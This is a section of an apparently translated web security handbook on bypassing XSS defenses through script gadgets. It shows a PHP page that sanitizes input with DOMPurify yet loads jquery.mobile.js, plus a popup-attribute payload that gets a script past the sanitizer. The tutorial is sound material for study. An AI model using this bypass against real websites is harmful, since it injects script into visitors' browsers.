4.2.9.3. Bypass Via Script Gadgets¶
4.2.9.3.1. Introduction¶
Some websites will use whitelisting or some DOM-based defenses, for which there is an called Code Reuse``can bypass . This method is similar to Gadget in binary attack and defense, using the legitimate code in the target to achieve the purpose of bypassing defense measures. The method is described in detail in the paper ``Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets.
A blog post by portswigger expresses a similar idea https://portswigger.net/blog/abusing-javascript-frameworks-to-bypass-xss-mitigations.
The following is a simple example. This example uses DOMPurify to fortify, but this can be attacked because import the jquery.mobile.js.
4.2.9.3.2. Examples¶
// index.php
<?php
$msg = $_GET['message'];
$msg = str_replace("\n", "", $msg);
$msg = base64_encode($msg);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Preview</title>
<script type="text/javascript" src="purify.js"></script>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="jquery.mobile.js"></script>
</head>
<body>
<script type="text/javascript">
var d= atob('<?php echo $msg; ?>');
var cleanvar = DOMPurify.sanitize(d);
document.write(cleanvar);
</script>
</body>
</html>
// payload
<div data-role=popup id='-->
<script>alert(1)</script>'>
</div>